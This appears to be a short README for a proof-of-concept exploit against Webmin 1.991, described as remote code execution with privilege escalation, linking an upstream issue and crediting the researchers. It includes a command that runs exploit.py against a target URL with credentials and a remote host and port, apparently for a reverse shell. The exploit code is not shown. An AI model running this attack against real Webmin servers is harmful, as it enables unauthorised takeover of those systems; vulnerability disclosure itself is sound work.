rce_webmin

RCE and privilege escalation webmin version 1.991

poc:

/usr/bin/env /bin/python ./exploit.py -u 'https://localhost:10000' -un 'safeusername' -pw 'safeuserpassword' -rh 'localhost' -rp 4445

Track the issue here:

webmin/webmin#1635

Credits

Thanks to the people below:

V1s3r1on for finding the CVE with me.

@chris001 for helping us out with the CVE numbers.

Rajchowdhury420 for fixing the SSL errors in console.